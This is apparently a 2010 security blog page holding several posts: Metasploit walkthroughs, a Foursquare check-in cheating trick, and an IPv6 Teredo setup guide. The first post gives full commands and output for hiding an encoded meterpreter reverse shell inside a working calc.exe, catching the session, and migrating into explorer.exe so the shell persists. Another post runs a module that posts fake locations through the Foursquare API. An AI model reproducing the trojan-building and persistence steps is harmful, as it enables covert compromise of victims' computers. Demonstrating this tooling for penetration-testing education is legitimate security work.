Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a
-b
-c
-e
-h Help banner
-i
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m
-n Dump encoder information
-o
-p
-s
-t
-x
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
carnal0wnage [Shared Reader]
Wednesday, March 24, 2010
Msfencode a Msfpayload Into An Existing Executable
Saturday, March 20, 2010
Working on a new tool
To the readers of this blog,
This blog has been inactive for about a month but it has nothing to do w/ a standstill on my part. I will post something useful relatively soon but please know I am co-authoring another AppSec specific tool and this takes up the majority of my time.
Hopefully when the software (open source) is released it won't disapoint :-)
Cheers,
~cktricky
Friday, March 19, 2010
F**king With Foursquare Goes MSF Style
mindless foursquare fun goes metasploit style...
msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info
Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host
Description:
Fuck with Foursquare, be anywhere you want to be by venue id
References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/
msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186
msf auxiliary(foursquare) > run
[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive
[*] Auxiliary module execution completed
You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
Thursday, March 18, 2010
Getting Started With IPv6
Getting IPv6 up and running
Install the miredo package:
$ sudo apt-get install miredo
After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.
Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove
Usage:
$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}
If miredo is running you should have another interface called "teredo".
You can display it with the following command:
$ ifconfig teredo
To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 ipv6.google.com PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes 64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms --- ipv6.google.com ping statistics --- 7 packets transmitted, 3 received, 57% packet loss, time 6000ms rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m
carnal0wnage ~: ping6 www.ipv6.org PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes 64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms --- www.ipv6.org ping statistics --- 7 packets transmitted, 5 received, 28% packet loss, time 6000ms rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms
carnal0wnage ~: traceroute6 www.ipv6.org traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets 1 * * * 2 terminator.csbnet.se (2a02:9a0:0:1::193) 612.035 ms 612.035 ms 612.035 ms 3 c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9) 648.037 ms 648.037 ms 648.037 ms 4 a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6) 636.036 ms 636.036 ms 636.036 ms 5 2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2) 736.042 ms 736.042 ms * 6 * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3) 324.018 ms 324.018 ms 7 igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6) 160.009 ms 156.009 ms 156.009 ms
Changing teredo server:
sudo vi /etc/miredo.conf ServerAddress teredo.ipv6.microsoft.com sudo /etc/init.d/miredo restart
Windows XP
Install
Open the Terminal with Start -> Run -> cmd
netsh interface ipv6 install netsh interface ipv6 set teredo client
Uninstall
netsh interface ipv6 uninstall
Vista
Install
IPV6 and Teredo is enabled per default. You can get into the settings by going into the preferences for an network interface. "Obtain an IPv6 address automatically" should do the trick.
Uninstall
Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\DisabledComponents
Or save the two lines in a .reg file and double-click it:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters] "DisabledComponents"=dword:000000ff
You can also go to the interface properties of an network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000.
Ref:
http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html
Monday, March 15, 2010
F**king with Foursquare
Foursquare is pretty neat. You can post you location via phone or browser and get nifty badges for different things or become a mayor of a place if you check in to that location the most. Its also exceedingly easy to cheat at.
I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.
Foursquare even has a nifty and pretty easy to understand API here:
http://groups.google.com/group/foursquare-api/web/api-documentation
The simplest thing you can do is checkin and post your location by vid or venue.
URL: http://api.foursquare.com/v1/checkin
Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes
Parameters:
- vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
- venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
- shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
- private - (optional). "1" means "don't show your friends". "0" means "show everyone"
- twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
- facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
- geolat - (optional, but recommended)
- geolong - (optional, but recommended)
So a sample request would look like:
POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Proxy-Connection: Keep-Alive
Content-Length:
twitter=1&facebook=0
It being a POST you'll have to write some code to handle the Content-Length or use Burp Repeater or Metasploit.
Have fun traveling the globe from your living room.
